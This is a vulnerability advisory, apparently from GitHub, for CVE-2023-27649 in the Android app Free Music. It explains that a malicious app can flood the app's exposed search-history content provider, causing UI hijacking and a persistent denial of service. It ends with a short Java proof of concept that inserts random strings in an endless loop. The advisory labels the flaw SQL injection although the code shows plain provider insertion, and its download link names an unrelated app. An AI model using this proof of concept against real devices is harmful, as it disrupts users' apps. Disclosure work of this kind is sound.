Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

SQL injection vulnerability exists in Free Music(CVE-2023-27649)

Vendor:Trusted Tools (https://bestools.group/)

Affected product:Free Music (freemusic.download.musicplayer.mp3player)

Version:2.1.0.47, 2.0.0.46, 1.9.1.45, 1.8.2.43

Download link:https://apkpure.com/cn/space-clean-super-cleaner/com.ludashi.xsuperclean

Description of the vulnerability for use in the CVE: SQL injection vulnerability found in Trusted Tools Free Music v.2.1.0.47, v.2.0.0.46, v.1.9.1.45, v.1.8.2.43 allows a remote attacker to cause a denial of service via the search history table.

Additional information:Free Music is a music player that includes a built-in search function. When a user searches for music, Free Music saves their search history in a database and displays it when the user clicks on the search box. However, an unauthorized malicious application can add arbitrary data to the search history table. This can result in the content of the app's user interface being hijacked. As the malicious data continues to accumulate, it can eventually trigger a denial of service attack when the user uses the search function. Unfortunately, even restarting the app will not fix this security issue, as the malicious data is stored persistently in the database.

poc:

public void attack(){
  ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
	Uri uri = Uri.parse("content://freemusic.download.musicplayer.mp3player.data/searchhistory");
	ContentValues contentValues = new ContentValues();
  while(true){
    contentValues.put("searchstring",randomString);
		contentResolver.insert(uri,contentValues);
  }
}